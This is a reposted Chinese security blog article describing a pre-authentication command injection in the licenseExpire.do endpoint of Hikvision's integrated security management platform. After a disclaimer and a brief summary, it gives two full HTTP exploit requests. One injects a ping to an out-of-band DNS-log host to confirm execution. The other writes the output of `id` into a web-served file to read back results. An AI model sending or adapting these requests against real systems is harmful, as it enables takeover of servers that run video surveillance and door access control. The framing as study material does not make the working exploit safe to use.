当前位置:   article > 正文

[漏洞复现]海康威视综合安防管理平台存在licenseExpire前台RCE_综合安防平台漏洞

综合安防平台漏洞

如果觉得该文章有帮助的,麻烦师傅们可以搜索下微信公众号良月安全。点个关注,感谢师傅们的支持。

免责声明

本号所发布的所有内容,包括但不限于信息、工具、项目以及文章,均旨在提供学习与研究之用。所有工具安全性自测。如因此产生的一切不良后果与文章作者和本公众号无关。如有涉及公司与个人敏感信息,侵权烦请告知,我们会立即删除并致歉。

漏洞简介

海康威视综合安防管理平台涵盖了视频监控、报警系统、门禁系统等众多功能,实现了全方位的安防管理。攻击者可通过前台RCE获取服务器权限。

漏洞POC

跟detection命令执行利用差不多

  1. POST /portal/cas/login/ajax/licenseExpire.do HTTP/1.1
  2. Host:
  3. Content-Type: application/x-www-form-urlencoded
  4. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
  5. {"type":"environment","operate":"","machines":{"id":"$(ping+qsdiehtuxn.dgrh3.cn)"}

执行回显

  1. POST /portal/cas/login/ajax/licenseExpire.do HTTP/1.1
  2. Host:
  3. Cache-Control: max-age=0
  4. Accept: application/json, text/javascript, */*; q=0.01
  5. X-Requested-With: XMLHttpRequest
  6. If-Modified-Since: Thu, 01 Jun 1970 00:00:00 GMT
  7. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
  8. Content-Type: application/x-www-form-urlencoded
  9. Accept-Encoding: gzip, deflate
  10. Accept-Language: zh-CN,zh;q=0.9
  11. Cookie: JSESSIONID=jp9u6tFmSc3fk7Jzf9DQjK25abfBb_b4Yy1r4rax; curtTabId=all; configMenu=
  12. Connection: close
  13. Content-Length: 135
  14. {"type":"environment","operate":"","machines":{"id":"$(id > /opt/hikvision/web/components/tomcat85linux64.1/webapps/vms/static/1.txt)"}

访问/vms/static/1.txt查看

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/空白诗007/article/detail/993354
推荐阅读
相关标签
  

闽ICP备14008679号